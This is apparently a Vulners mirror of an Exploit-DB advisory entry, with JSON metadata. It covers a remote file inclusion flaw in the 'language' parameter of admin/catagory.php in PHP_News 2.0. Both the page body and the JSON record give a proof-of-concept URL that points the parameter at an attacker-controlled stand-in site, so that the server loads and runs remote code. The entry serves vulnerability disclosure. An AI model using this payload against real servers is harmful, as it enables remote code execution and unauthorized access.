Search...

php_news 2.0 admin/catagory.php language Parameter Remote File Inclusion

2006-09-25T00:00:00

ID EDB-ID:28689
Type exploitdb
Reporter Root3r_H3ll
Modified 2006-09-25T00:00:00

Description

php_news 2.0 admin/catagory.php language Parameter Remote File Inclusion. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/20209/info
  
PHP_News is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
  
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
  
PHP_News version 2.0 is vulnerable to these issues.

http://www.example.com/[path]/admin/catagory.php?language=attacker's_site

JSON Vulners Source

Initial Source

{"id": "EDB-ID:28689", "hash": "5392080391a349c5c90ab3c589ec9424", "type": "exploitdb", "bulletinFamily": "exploit", "title": "php_news 2.0 admin/catagory.php language Parameter Remote File Inclusion", "description": "php_news 2.0 admin/catagory.php language Parameter Remote File Inclusion. Webapps exploit for php platform", "published": "2006-09-25T00:00:00", "modified": "2006-09-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/28689/", "reporter": "Root3r_H3ll", "references": [], "cvelist": [], "lastseen": "2016-02-03T08:42:53", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-02-03T08:42:53"}, "dependencies": {"references": [], "modified": "2016-02-03T08:42:53"}, "vulnersScore": 0.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/28689/", "sourceData": "source: http://www.securityfocus.com/bid/20209/info\r\n \r\nPHP_News is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.\r\n \r\nA successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.\r\n \r\nPHP_News version 2.0 is vulnerable to these issues.\r\n\r\nhttp://www.example.com/[path]/admin/catagory.php?language=attacker's_site", "osvdbidlist": ["32317"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}